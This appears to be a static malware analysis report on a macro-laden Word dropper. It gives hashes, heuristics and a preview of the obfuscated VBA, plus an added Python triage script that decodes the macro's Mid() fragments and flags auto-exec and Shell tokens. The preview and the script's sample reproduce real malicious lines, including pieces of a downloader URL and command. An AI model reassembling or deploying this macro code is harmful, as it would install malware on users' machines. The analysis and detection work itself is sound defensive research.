Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ba66f04789efa45a…

MALICIOUS

Office (OLE)

Size: 260.5 KB
Created: 2017-12-28 07:33:00
Authoring application: Microsoft Office Word
First seen: 2018-01-08
MD5: 2804fca78642cb4b6cd0dcf7ca1ff44a
SHA-1: a52aa45f3393c3c8af12a2cf708c0f043b23508f
SHA-256: ba66f04789efa45a1d190d16e135e2ffed567934d93041f686f1a5a75f7d72bb
Risk score: 242

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File

The file is a malicious Word (OLE) document carrying a VBA project with an AutoOpen entry point, so the macro runs as soon as the document is opened with macros enabled. The macro calls Shell(), which hands a command string to the operating system for execution under the user's token. The recovered source is heavily obfuscated: most of it consists of long arithmetic expressions over variables that are never defined, evaluated under On Error Resume Next so that every resulting error is silently swallowed, interleaved with Mid() calls that slice short fragments out of longer junk strings. The fragments visible in the preview below include a chunked http:/ URL and the tokens foreach, .Split( and .REPlACe(, which is consistent with a downloader command being reassembled from pieces at run time. ClamAV's Img.Dropper.PhishingLure-6443153-0 signature agrees with the dropper/phishing-lure assessment. The final command string was not recovered in this static pass, so the download-and-execute behaviour is inferred from the macro's structure rather than observed.

Heuristics (7)

  • ClamAV: Img.Dropper.PhishingLure-6443153-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    The VBA source calls Shell(), which executes an arbitrary command line with the privileges of the user who opened the document
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    The VBA project defines an AutoOpen procedure, which Word runs automatically when the document is opened with macros enabled
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for the old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note that for this sample a VBA project was in fact recovered (macros.bas under Extracted artifacts), so this marker duplicates the VBA findings above rather than adding independent evidence.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main    Channel: document text (OLE body). This is the standard DrawingML XML namespace URI, present in any Office document that contains drawing objects; it is not an indicator of compromise.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename     Kind        Source                                               Size
macros.bas   vba-macro   oletools.olevba.extract_macros (decoded VBA source)  101936 bytes
SHA-256: ee97d2cd3a545d6d305e7e3d1d62dfd9e2fc1c72703ec26b8e399fa6e5f51cc8
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "cwCfcXJ"
Function SANtdmVwroBwu()
On Error Resume Next
TAjkKQhB = (247 - Tan(733 * CInt(2865)) * KMwFciw - UPiibqwfvFckHO / (4772 - CStr(PXinTmRcizvZc) + iUmRw3 + CDate(HnZKnzEoPH / CDbl(SrmDLfzwThh - qfHDmEjjQVGoSD * 318 / Atn(8673))) * TQoaIWIBuiZ + CSng(TzdJraoif)))
QrNvjqfw = (247 - Tan(733 * CInt(2865)) * ZVBBGzaWlbUiM - XDmiqQmbub / (4772 - CStr(FoEqrmnVY) + iUmRw3 + CDate(KvDYqiUKurZjbp / CDbl(iEUBBwbanAIV - uphNnWNIjKz * 318 / Atn(8673))) * SQAjpVMPDJhS + CSng(XwiVQXiJoQ)))
qnzXOloQ = Mid("ZjDTtm0j);4qs+4qs'+'Y5Bka4qs+4qsrapas = 4qs+4qsY5BcN0QmakOmjpijRFzzYRu6iTds", 8, 43)
oTCCziofUPG = (247 - Tan(733 * CInt(2865)) * uSjjaOwlwkI - iffGZbh / (4772 - CStr(MYMmPjnLONd) + iUmRw3 + CDate(unWVrbwuEJ / CDbl(pJOTzilANAA - VFzRqalXk * 318 / Atn(8673))) * oKqJJOzi + CSng(ZDsXcBQpjcNQT)))
LVQqB = (247 - Tan(733 * CInt(2865)) * sbYwGLfXiDuX - zHrpMcrz / (4772 - CStr(AKjnprsSHW) + iUmRw3 + CDate(JaWHwGGIL / CDbl(mSlBzIuU - QDlYaNNTVniQ * 318 / Atn(8673))) * XIDYkktFVjnKOr + CSng(lrjwwYFMXCwtjn)))
szZsiQF = (247 - Tan(733 * CInt(2865)) * UAQuKFTSlviVDd - VXDiNaPchUPal / (4772 - CStr(vXqUQVJ) + iUmRw3 + CDate(UnZTHRwoHznBL / CDbl(KhGTFXi - uiiOqYsBmH * 318 / Atn(8673))) * cCPJtTzjsNR + CSng(jtpNJOzQlKvtu)))
RfvzQlO = Mid("wER0ZHMoGPPEpTEG4R4f4qBnw+Bnws+4qsge;}}4qs).REPlACe(VD", 21, 32)
PzTnahHBZI = (247 - Tan(733 * CInt(2865)) * UhuqvcwZXKac - TzNMWOhdEfRXRw / (4772 - CStr(VoqKRkOGPXw) + iUmRw3 + CDate(nSLoYvLsao / CDbl(XUGHQBcTdjSD - TPLKFqzoZtuL * 318 / Atn(8673))) * rtbGEEjFTqLcz + CSng(nETpUOc)))
SwmLHKi = (247 - Tan(733 * CInt(2865)) * IipXlSzG - njhRqnnuucW / (4772 - CStr(ZTBSlQMmwK) + iUmRw3 + CDate(lIwoLfUUpPh / CDbl(tKzthRNR - hojKnEz * 318 / Atn(8673))) * kTccIvI + CSng(wbPaHjHrGIIoX)))
HtsRzUDa = (247 - Tan(733 * CInt(2865)) * IkAmkruzbL - XKirWbOXdAZzhH / (4772 - CStr(KkFDazRWlqGR) + iUmRw3 + CDate(pKVPzhauEM / CDbl(NFqwUilSiwjKsX - zGozAPJthTfK * 318 / Atn(8673))) * AhrFXIpUHSBDFn + CSng(WIzdrOjUFHMhD)))
qGAjpYd = Mid("EdcN6wIhzFusdrPV1wBnwM6j4qs+4qs;Bnw+Bnw4qs+4qsf4qs+4qsor4qs+4qseach(4qs+4qsY5Babc 4wCw9kiI1", 19, 65)
HRIBYuhL = (247 - Tan(733 * CInt(2865)) * UltVETOdXaU - FwFkkOoAi / (4772 - CStr(zrwAjsEfwLiEz) + iUmRw3 + CDate(inqpdVEoGpbLl / CDbl(XtzWzinCYE - WZsdInAwOCzY * 318 / Atn(8673))) * XMmJlHYVGiHCMI + CSng(UDjOmCHw)))
GbtwmKY = (247 - Tan(733 * CInt(2865)) * FmiKWKwNliPT - PqzIYEKtmk / (4772 - CStr(aNcYqRzNob) + iUmRw3 + CDate(EFtNISSrdSrIM / CDbl(vbwQosTB - kJhaXUi * 318 / Atn(8673))) * fvXlsOK + CSng(sauHHjEQLupAzA)))
vbXwCoit = (247 - Tan(733 * CInt(2865)) * LzCbOXTa - AzksiQRfRP / (4772 - CStr(kavfsbKVjlwPQ) + iUmRw3 + CDate(wnFzGjOhhMI / CDbl(cZPwGlsFbk - WinMwrj * 318 / Atn(8673))) * kTRjdMh + CSng(fcCtjWUz)))
zitWsii = Mid("EWOjUpSaLqs/4qs+4qs,http:/4qs+4qs/vtour4q'+'s+4qss.r4qs+4qs'+'u/fu4qs+4qsiXaK6/4qs+4qsM6j4qs'+'+4qBnw+Bnws.S4qs+4qspl4qs+4qsit(M4q'+wqHaRRFFt", 10, 123)
jdoAsK = (247 - Tan(733 * CInt(2865)) * YDzJDasvXuQM - pbDNnVvRZ / (4772 - CStr(wAFROciiEfLwis) + iUmRw3 + CDate(HUzfWMq / CDbl(qakrcNbESz - BIwJiTtM * 318 / Atn(8673))) * hBrtKHjA + CSng(mCiIdOrdkBUcbt)))
fZrVJpMIK = (247 - Tan(733 * CInt(2865)) * DtQOpUjPnGbG - cOiHwYFLzkzE / (4772 - CStr(TIpaJlSfmRuzpr) + iUmRw3 + CDate(SwoQMkPlNw / CDbl(OTYGIRJvBYaNzq - EpwoHJjjswvjr * 318 / Atn(8673))) * EXbbMWwG + CSng(IcptqzslraY)))
DDddIpKjPiS = (247 - Tan(733 * CInt(2865)) * ZrzILVMdAipojr - VjbHjzatikSA / (4772 - CStr(srjFIsTSKYpb) + iUmRw3 + CDate(YiinZHmDfoB / CDbl(MAzwSYtVdl - ukjrYOLI * 318 / Atn(8673))) * jGZsPqKKNiMC + CSng(mvrTUrzwGwnZ)))
InqkzRi = Mid("DUvCTtZ5jfEmNIDD44kFHXsjXqs+4qsin4qs+4qs Y5Bb4qs+4Bnw+Bn'+'wqscBnw+Bnwd){t4Bnw+BnwqGzpEmUi", 26, 58)
tYLmliMfTs = (247 - Tan(733 * CInt(2865)) * ZoYqnhkfHNi - mwAwlkTpz / (4772 - CStr(oLSQqlAN) + iUmRw3 + CDate(JSdiiDk / CDbl(oObZuuXHtz - AGGjiQzNYXrwft 
... (truncated)
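The preview above shows the obfuscation pattern the summary describes: one arithmetic template over undefined variable names, stamped out dozens of times, with the real data hidden in Mid() slices of longer junk strings. The Python script below is an added triage helper written for this report; it is not part of the analysis platform, of oletools, or of the sample. It strips the repeated noise template, evaluates the Mid() calls the way VBA does (1-based start, remainder if the length overshoots), and scans for the auto-exec and execution tokens that a heuristic such as OLE_VBA_PCODE_AUTOEXEC_EXEC keys on. The token lists are a minimal approximation and an assumption on my part. The embedded SAMPLE is constructed: it takes six lines verbatim from the preview (three noise lines, three Mid() calls) and wraps them in a hypothetical AutoOpen/Shell() stub, since the report states those are present in macros.bas but they fall outside the shown lines. The script deliberately leaves the second-stage placeholders seen in the fragments ('4qs', 'Bnw', 'Y5B') as found; their mapping is not stated in the report.

```python
from __future__ import annotations
import re
from collections import Counter

# Assumption: minimal token lists approximating what an auto-exec + execution
# heuristic such as OLE_VBA_PCODE_AUTOEXEC_EXEC keys on; not the platform's own lists.
AUTOEXEC_TOKENS = ("AutoOpen", "Document_Open", "AutoExec", "AutoClose", "Auto_Open", "Workbook_Open")
EXEC_TOKENS = ("Shell", "WScript.Shell", "CreateObject", "powershell", "cmd.exe",
               "URLDownloadToFile", "XMLHTTP", "ADODB.Stream")

MID_RE = re.compile(r'Mid\("((?:[^"]|"")*)",\s*(\d+),\s*(\d+)\)', re.IGNORECASE)
STR_RE = re.compile(r'"(?:[^"]|"")*"')
IDENT_RE = re.compile(r"\b[A-Za-z_]\w*\b")
NUM_RE = re.compile(r"\b\d+(?:\.\d+)?\b")
ARITH_RE = re.compile(r"[-+*/]")


def vba_mid(s: str, start: int, length: int) -> str:
    """VBA Mid(): start is 1-based; a length past the end returns the remainder."""
    if start < 1:
        raise ValueError("VBA Mid() start is 1-based")
    return s[start - 1:start - 1 + length]


def recover_mid_fragments(source: str) -> list[str]:
    """Evaluate every Mid("literal", start, len) call, in source order ("" escapes a quote)."""
    return [vba_mid(m.group(1).replace('""', '"'), int(m.group(2)), int(m.group(3)))
            for m in MID_RE.finditer(source)]


def _shape(line: str) -> str:
    """Syntactic shape of a line: literals -> "", identifiers -> @, numbers -> #."""
    s = NUM_RE.sub("#", IDENT_RE.sub("@", STR_RE.sub('""', line)))
    return re.sub(r"\s+", " ", s).strip()


def strip_template_noise(source: str, min_repeats: int = 3) -> tuple[str, int]:
    """Drop arithmetic assignments whose shape recurs >= min_repeats times.

    The preview's junk lines are one template, `x = (247 - Tan(733 * ...`, stamped out
    with fresh random names that are never defined; they only 'run' because
    `On Error Resume Next` swallows the errors. Lines holding a string literal are
    always kept, since those carry the payload fragments.
    """
    lines = source.splitlines()
    shapes = [_shape(ln) for ln in lines]
    counts = Counter(shapes)
    kept = [ln for ln, sh in zip(lines, shapes)
            if not (counts[sh] >= min_repeats and "=" in ln
                    and not STR_RE.search(ln) and ARITH_RE.search(ln))]
    return "\n".join(kept), len(lines) - len(kept)


def scan_tokens(text: str) -> tuple[list[str], list[str]]:
    """Whole-token, case-insensitive scan (VBA identifiers are case-insensitive)."""
    def hit(tok: str) -> bool:
        return re.search(r"(?<![\w.])" + re.escape(tok) + r"(?!\w)", text, re.IGNORECASE) is not None
    return [t for t in AUTOEXEC_TOKENS if hit(t)], [t for t in EXEC_TOKENS if hit(t)]


def triage(source: str) -> dict:
    """One analyst-facing result: noise removed, recovered fragments, tokens, verdict."""
    cleaned, removed = strip_template_noise(source)
    fragments = recover_mid_fragments(source)
    autoexec, execs = scan_tokens(source)
    verdict = "autoexec+exec" if autoexec and execs else "autoexec" if autoexec else "exec" if execs else "none"
    return {
        "noise_lines_removed": removed,
        "cleaned_source": cleaned,
        "fragments": fragments,
        # A chunked URL never matches a URL regex on the raw source; look inside the slices.
        "url_fragments": [f for f in fragments if re.search(r"https?:/", f, re.IGNORECASE)],
        "autoexec": autoexec,
        "exec_tokens": execs,
        "verdict": verdict,
    }


# Constructed sample: six lines copied verbatim from the preview inside a hypothetical
# AutoOpen/Shell() stub (the report states both exist in macros.bas, outside the shown lines).
SAMPLE = r'''Attribute VB_Name = "cwCfcXJ"
Sub AutoOpen()
    r = Shell(SANtdmVwroBwu(), 0)
End Sub
Function SANtdmVwroBwu()
On Error Resume Next
TAjkKQhB = (247 - Tan(733 * CInt(2865)) * KMwFciw - UPiibqwfvFckHO / (4772 - CStr(PXinTmRcizvZc) + iUmRw3 + CDate(HnZKnzEoPH / CDbl(SrmDLfzwThh - qfHDmEjjQVGoSD * 318 / Atn(8673))) * TQoaIWIBuiZ + CSng(TzdJraoif)))
QrNvjqfw = (247 - Tan(733 * CInt(2865)) * ZVBBGzaWlbUiM - XDmiqQmbub / (4772 - CStr(FoEqrmnVY) + iUmRw3 + CDate(KvDYqiUKurZjbp / CDbl(iEUBBwbanAIV - uphNnWNIjKz * 318 / Atn(8673))) * SQAjpVMPDJhS + CSng(XwiVQXiJoQ)))
qnzXOloQ = Mid("ZjDTtm0j);4qs+4qs'+'Y5Bka4qs+4qsrapas = 4qs+4qsY5BcN0QmakOmjpijRFzzYRu6iTds", 8, 43)
oTCCziofUPG = (247 - Tan(733 * CInt(2865)) * uSjjaOwlwkI - iffGZbh / (4772 - CStr(MYMmPjnLONd) + iUmRw3 + CDate(unWVrbwuEJ / CDbl(pJOTzilANAA - VFzRqalXk * 318 / Atn(8673))) * oKqJJOzi + CSng(ZDsXcBQpjcNQT)))
RfvzQlO = Mid("wER0ZHMoGPPEpTEG4R4f4qBnw+Bnws+4qsge;}}4qs).REPlACe(VD", 21, 32)
zitWsii = Mid("EWOjUpSaLqs/4qs+4qs,http:/4qs+4qs/vtour4q'+'s+4qss.r4qs+4qs'+'u/fu4qs+4qsiXaK6/4qs+4qsM6j4qs'+'+4qBnw+Bnws.S4qs+4qspl4qs+4qsit(M4q'+wqHaRRFFt", 10, 123)
End Function
'''

if __name__ == "__main__":
    result = triage(SAMPLE)
    print("verdict:", result["verdict"], "| noise lines removed:", result["noise_lines_removed"])
    for frag in result["fragments"]:
        print("fragment:", frag)
```

Run the file directly to see the verdict, the noise count and the recovered slices; feed it the full macros.bas instead of SAMPLE to triage the real artifact. The shape-based noise filter is the part worth reusing: it does not depend on the specific constants of this sample, only on the fact that generated junk repeats one syntactic template while the lines that matter carry string literals. The separate url_fragments field exists because a URL split across concatenated pieces never matches a URL regex on the raw source, which is exactly why the EMBEDDED_URL heuristic above saw only the benign schema URI.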